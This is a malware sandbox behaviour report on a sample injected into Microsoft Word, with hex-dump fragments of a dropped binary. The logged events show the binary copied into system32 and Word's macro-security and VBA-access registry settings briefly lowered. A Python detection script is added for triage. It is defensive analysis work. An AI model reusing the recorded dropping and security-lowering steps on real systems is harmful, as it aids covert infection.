File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: AA BF 5B 1E C6 BA A6 BF 45 90 AB B0 F8 B4 B8 C4 C2 CB 2F 6E FC 95 89 D2 2A FE CE C9 95 D5 DC A1 D8 91 29 6B E9 DD D4 D0 30 E0 84 DD 91 CC DD B6 85 DD 39 30 B6 D2 D6 BF 88 6E ED F7 AB 5D 1B F2 9B 89 28 7B A8 CE C7 DD 45 FE 3D DC 82 83 D6 C4 00 90 40 00 00 00 00 00 00 00 00 00 00 00 00 00 04 70 00 10 success or wait 532825201
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 532947139
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 00 4F 68 7A 67 6E 00 59 45 45 59 63 75 6E 6F 71 6A 77 00 44 66 67 67 75 76 56 48 52 50 00 74 79 6F 71 75 62 00 47 68 67 6E 63 75 65 20 4C 78 71 67 76 6B 72 6E 20 77 79 6E 73 75 61 00 25 76 20 4F 6D 64 20 22 25 75 22 28 45 79 42 64 6F 20 77 20 43 55 20 56 74 78 6C 71 6B 29 20 43 75 20 4F 6F 74 6A 0D success or wait 533048521
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 00 00 00 00 36 3F 91 4C 00 00 00 00 6E 90 00 00 01 00 00 00 07 00 00 00 07 00 00 00 28 90 00 00 44 90 00 00 60 90 00 00 9C 10 00 00 E0 10 00 00 E8 10 00 00 F4 15 00 00 0C 16 00 00 D8 16 00 00 70 15 00 00 78 90 00 00 80 90 00 00 8A 90 00 00 95 90 00 00 9C 90 00 00 A3 90 00 00 AA 90 00 00 00 00 01 00 success or wait 533053349
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 00 10 00 00 A8 00 00 00 3A 30 53 30 5E 30 75 30 92 30 A9 30 BF 30 FA 30 16 31 40 31 46 31 75 31 87 31 93 31 99 31 C3 31 D0 31 DE 31 E4 31 08 32 0E 32 2F 32 51 32 69 32 72 32 BB 32 E3 32 37 33 5C 33 78 33 8A 33 E4 33 1A 34 38 34 43 34 98 34 AD 34 D7 34 EC 34 F8 34 06 35 93 35 AA 35 B1 35 C0 35 C6 35 success or wait 533062648
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 0 Value: unknown success or wait 533164320
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: write and read and execute Type: commit Baseaddress: 3A0000 Size: 24576 Protection: execute Mapped to pid: own pid success or wait 533496748
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: query and write and read and execute Type: image Baseaddress: 10000000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 533614528
Section loaded Path: \KnownDlls\user32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 536593642
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 536681058
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3A0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 537361369
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3A0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 537576503
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 537688339
Section loaded Path: \KnownDlls\ws2_32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 538506166
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 538585998
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 539033665
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 539144363
Section loaded Path: \KnownDlls\iphlpapi.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 539872039
Section loaded Path: C:\WINDOWS\system32\iphlpapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D60000 Size: 102400 Protection: read write Mapped to pid: own pid success or wait 539983603
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 543957631
Section loaded Path: \KnownDlls\oleaut32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 545416677
Key created Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security success or wait 742506083
Key value queried Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: Level object name not found 742506639
Key value queried Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: AccessVBOM object name not found 742506843
Key value set Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: Level Type: dword Data: 1 Old data: success or wait 742507069
Key value set Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: AccessVBOM Type: dword Data: 1 Old data: success or wait 742617277
Thread delayed Time: -5 TID: 712 success or wait 980996250
Key value queried Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: Level success or wait 999402974
Key value queried Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: AccessVBOM success or wait 999619868
Key value replaced with new Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: Level Type: dword Data: 4 Old data: 1 success or wait 999841230
Key value replaced with new Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: AccessVBOM Type: dword Data: 0 Old data: 1 success or wait 999843986
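The event lines above record the chain a responder cares about: a PE image is written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp (the write at 532174228 begins with the DOS header 4D 5A and carries e_lfanew = 0x80), the same file is copied to C:\WINDOWS\system32\hyli.igo under a non-standard extension, the Winlogon Shell value is read, and the code injected into WINWORD.EXE first sets Word's Security\Level to 1 (Low) and AccessVBOM to 1 (trust access to the VBA project object model), then puts them back to 4 and 0. The following Python is an added example, not Joe Sandbox's code: it parses behaviour lines in the "event kind Key: value ... status timestamp" layout assumed from this page and flags those four behaviours. The sample lines are copied from the report above, except that the MZ write is rebuilt from the header bytes shown there rather than the full 1024-byte dump; the rule names and the "Level <= 2 counts as lowered" threshold are the example's own choices.

```python
"""Triage of Joe Sandbox-style behaviour lines (added example, not tool code).

Parses "<event kind> Key: value ... <status> <timestamp>" lines as printed on
this page (layout assumed from the report) and flags: a PE image being written
(DOS 'MZ' header, e_lfanew extracted), a writable open under system32 (odd
extension noted), a read of Winlogon\\Shell, and Office <app>\\Security
tampering: Level (1 = Low ... 4 = Very High in Office 2003) and AccessVBOM
(1 = trust access to the VBA project object model).
"""
import ntpath
import re
from typing import Dict, List, Optional

STATUS_RE = re.compile(
    r"\s*(success or wait|object name not found|access denied|object name exists)"
    r"\s+(\d+)\s*$")
# Longer keys precede their prefixes so "Old data" wins over "Data", etc.
KEY_RE = re.compile(
    r"\b(Old data|Allocation Type|Content Overwritten|Mapped to pid|Baseaddress|"
    r"Imagepath|Path|Name|Type|Data|Offset|Length|Value|Access|Options|Attributes|"
    r"Base|Size|Protection|PID|TID|Time|EIP|EAX): ?")
SYSTEM_DIR_RE = re.compile(r"^C:\\WINDOWS\\system32\\", re.I)
OFFICE_SEC_RE = re.compile(r"\\Software\\Microsoft\\Office\\[\d.]+\\(\w+)\\Security$", re.I)
PE_EXT = {".exe", ".dll", ".sys", ".ocx", ".cpl", ".scr", ".drv"}


def parse_event(line: str) -> Dict[str, str]:
    """Split one line into {'kind', 'status', 'ts', <Key>: <value>, ...}."""
    m = STATUS_RE.search(line)
    status, ts = (m.group(1), m.group(2)) if m else ("", "")
    body = line[: m.start()] if m else line
    keys = list(KEY_RE.finditer(body))
    ev = {"kind": (body[: keys[0].start()] if keys else body).strip(),
          "status": status, "ts": ts}
    for i, k in enumerate(keys):
        end = keys[i + 1].start() if i + 1 < len(keys) else len(body)
        ev[k.group(1)] = body[k.end():end].strip()
    return ev


def pe_e_lfanew(data: bytes) -> Optional[int]:
    """e_lfanew (offset of the PE header) if data starts with a DOS header, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    return int.from_bytes(data[0x3C:0x40], "little")


def hex_dump_to_bytes(value: str) -> bytes:
    """'4D 5A 90 ...' -> bytes; 'unknown' and other non-hex values give b''."""
    try:
        return bytes.fromhex(value)
    except ValueError:
        return b""


def analyze(lines: List[str]) -> List[Dict[str, object]]:
    """Run the detection rules over behaviour lines; findings keep input order."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        ev = parse_event(line)
        kind, path = ev["kind"], ev.get("Path", "")
        if kind == "File write":
            off = pe_e_lfanew(hex_dump_to_bytes(ev.get("Value", "")))
            if off is not None:
                findings.append({"rule": "dropped_pe", "path": path, "e_lfanew": off})
        elif kind in ("File opened", "File created") and SYSTEM_DIR_RE.match(path) \
                and "generic write" in ev.get("Access", ""):
            ext = ntpath.splitext(path)[1].lower()
            findings.append({"rule": "system32_write", "path": path,
                             "odd_extension": ext not in PE_EXT})
        elif kind == "Key value queried" and path.lower().endswith("\\winlogon") \
                and ev.get("Name") == "Shell":
            findings.append({"rule": "winlogon_shell_read", "path": path})
        elif kind in ("Key value set", "Key value replaced with new"):
            m = OFFICE_SEC_RE.search(path)
            if not (m and ev.get("Type") == "dword" and ev.get("Data", "").isdigit()):
                continue
            name, val = ev.get("Name"), int(ev["Data"])
            if name == "Level":
                rule = "macro_security_lowered" if val <= 2 else "macro_security_restored"
            elif name == "AccessVBOM":
                rule = "vbom_access_enabled" if val == 1 else "vbom_access_restored"
            else:
                continue
            findings.append({"rule": rule, "app": m.group(1), "value": val,
                             "old": ev.get("Old data", "")})
    return findings


# Constructed sample: lines copied from the report above; the MZ write is rebuilt
# from the DOS header bytes shown there, not the full 1024-byte dump.
MZ_HEX = ("4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 "
          "40 00 00 00 " + "00 " * 32 + "80 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21")
SAMPLE = [
    r"File opened Path: C:\WINDOWS\system32\hyli.igo Access: read attributes and delete and "
    r"synchronize and generic write Options: sequential only and synchronous io non alert and "
    r"non directory file Attributes: archive Content Overwritten: true success or wait 1023727864",
    r"Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "
    r"Name: Shell success or wait 1024171676",
    r"File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: "
    + MZ_HEX + " success or wait 532174228",
    r"File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 0 "
    r"Value: unknown success or wait 533164320",
    r"Key value set Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: Level "
    r"Type: dword Data: 1 Old data: success or wait 742507069",
    r"Key value set Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Name: AccessVBOM "
    r"Type: dword Data: 1 Old data: success or wait 742617277",
    r"Key value replaced with new Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security "
    r"Name: Level Type: dword Data: 4 Old data: 1 success or wait 999841230",
    r"Key value replaced with new Path: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security "
    r"Name: AccessVBOM Type: dword Data: 0 Old data: 1 success or wait 999843986",
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE):
        print(finding)
```

Run against the full event list of a report, the "lowered" followed by "restored" pair is the tell: the settings are changed only for the window in which the injected code needs Word to run macros and reach the VBA project model, so a host-side check taken after the fact will show the defaults again. The dropped_pe finding also gives the e_lfanew offset, so a truncated dump (like the 1024-byte writes here) can be checked for whether the PE header itself was captured.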
General
Start time: 09:39:59
Start date: 24/01/2012
Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
Wow64 process (32bit): false
Commandline: unknown
Imagebase: 0x30000000
File size: 12061896 bytes
MD5 hash: 7A0FA3A0282B4630F3768A74441D4BAE

File Activities

File Path Access Options Content overwritten Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp read attributes and synchronize and generic read sequential only and synchronous io non alert and non directory file and open reparse point true success or wait 1 266116C CopyFileA
File Path Access Attributes Options Completion Count Source Address Symbol
C:\WINDOWS\system32\hyli.igo read attributes and delete and synchronize and generic write archive sequential only and synchronous io non alert and non directory file success or wait 1 266116C CopyFileA
Old File Path New File Path Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp C:\WINDOWS\system32\hyli.igo success or wait 1 266116C CopyFileA

Section Activities

File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 850000 12288 own pid readonly success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL write and read and execute commit 860000 12242944 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL query and write and read and execute image 30C90000 12288000 own pid read write success or wait 1
\BaseNamedObjects\ShimSharedMemory write unknown 870000 57344 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL write and read and execute commit 8C0000 774144 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL query and read commit 8C0000 774144 own pid readonly success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19211106568_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19211106568_S-1-5-21-507921405-1960408961-839522115-500 query and write and read reserve A10000 126976 own pid read write success or wait 1
\KnownDlls\uxtheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit A30000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit A30000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit A30000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit A30000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit A50000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown A50000